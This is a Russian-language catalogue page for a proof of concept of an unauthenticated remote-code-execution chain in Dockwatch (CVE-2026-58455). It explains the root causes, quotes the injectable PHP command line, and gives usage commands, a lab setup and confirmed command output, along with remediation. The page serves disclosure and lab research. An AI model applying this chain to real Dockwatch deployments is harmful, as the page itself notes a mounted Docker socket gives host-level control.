Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-58455-PoC — PoC для CVE-2026-58455: Dockwatch <=0.6.567 неаутентифицированное RCE. Python только со стандартной библиотекой. | Kitploit
Инструменты/GitHubGitHub/boreas37/cve-2026-58455-poc
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеЛаборатории и Практика
GitHubboreas37/cve-2026-58455-poc

CVE-2026-58455-PoC

PoC для CVE-2026-58455: Dockwatch <=0.6.567 неаутентифицированное RCE. Python только со стандартной библиотекой.

Репозиторий
3 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-58455 — Dockwatch Неаутентифицированное RCE (обход аутентификации + инъекция команд)

PoC для CVE-2026-58455: неаутентифицированное удалённое выполнение кода в Dockwatch (от Notifiarr), веб-интерфейсе для управления Docker-контейнерами с самостоятельным хостингом. Затрагивает все версии до 0.6.567 включительно.

Корневая причина (подтверждено по исходному коду)

Три уязвимости, объединённые в цепочку:

  1. Флаг сессии устанавливается без аутентификации — GET /includes/header.php выполняет $_SESSION['IN_DOCKWATCH'] = true; для любого посетителя. AJAX-слой (ajax/shared.php) проверяет только этот флаг.
  2. Отсутствует exit() после редиректа аутентификации — loader.php отправляет заголовок Location: login.php, когда $_SESSION['authenticated'] равен false, но не завершает выполнение, поэтому остальная часть запроса продолжает работать.
  3. Инъекция OS-команд — ajax/compose.php (m=composePull) формирует shell-команду с несанитизированным вводом:
    root@kitploit:~
    $cmd = 'cd ' . $_POST['composePath'] . ' && docker-compose pull';
    $pull = $shell->exec($cmd . ' 2>&1');
    
    Вывод отражается обратно в HTTP-ответе.

В цепочке: неаутентифицированный удалённый злоумышленник выполняет произвольные OS-команды от имени пользователя веб-сервера внутри контейнера. Типовые развёртывания монтируют /var/run/docker.sock в контейнер → это эквивалентно root на хосте.

Использование

root@kitploit:~
python3 dockwatch_rce_poc.py --url http://HOST:PORT --command "id; hostname"
python3 dockwatch_rce_poc.py --url http://localhost:8888            # значения по умолчанию

Только стандартная библиотека Python 3.

Лабораторный стенд (воспроизведение)

root@kitploit:~
docker run -d --name dockwatch-lab -p 8888:80 \
  -v /var/run/docker.sock:/var/run/docker.sock \
  ghcr.io/notifiarr/dockwatch:v0.6.567

Подтверждённый вывод

root@kitploit:~
$ python3 dockwatch_rce_poc.py --url http://localhost:8888 --command "id; hostname"
[+] Dockwatch fingerprint confirmed (200) <title>Dockwatch</title>
[+] Session primed (IN_DOCKWATCH flag set)
[*] ajax/compose.php responded HTTP 200, 100 bytes
[+] Command output recovered:
    uid=911(abc) gid=911(abc) groups=911(abc),281(unraiddocker),992(groupls7j),1000(users)
=> PASS (RCE confirmed)

Устранение

Обновите Dockwatch до версии новее 0.6.567. В качестве меры смягчения не открывайте Dockwatch для ненадёжных сетей и удалите привязку Docker-сокета, если она не требуется.

Отказ от ответственности

Только для авторизованных исследований в области безопасности и использования в лабораторных условиях.

Скачать инструмент